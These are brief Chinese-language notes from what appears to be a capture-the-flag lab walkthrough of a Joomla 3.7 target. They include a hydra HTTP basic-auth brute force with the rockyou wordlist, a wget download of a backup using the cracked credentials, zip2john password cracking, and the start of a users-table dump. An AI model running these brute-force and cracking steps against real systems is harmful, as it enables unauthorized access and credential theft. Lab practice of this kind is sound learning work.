爆破发现secret.txt
接着爆破
hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.182.148 http-get
其实我想知道的是命令为什么是这样写的
又是joomla
/language/en-GB/en-GB.xml
3.7版本
wget --user=joker --password=hannah http://10.10.182.148:8080/backup.zip
备份文件拉取下了,需要密码
zip2john file hashjohn hash
密码也是hannah
数据库里有
LOCK TABLES `cc1gr_users` WRITE;/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com',' ...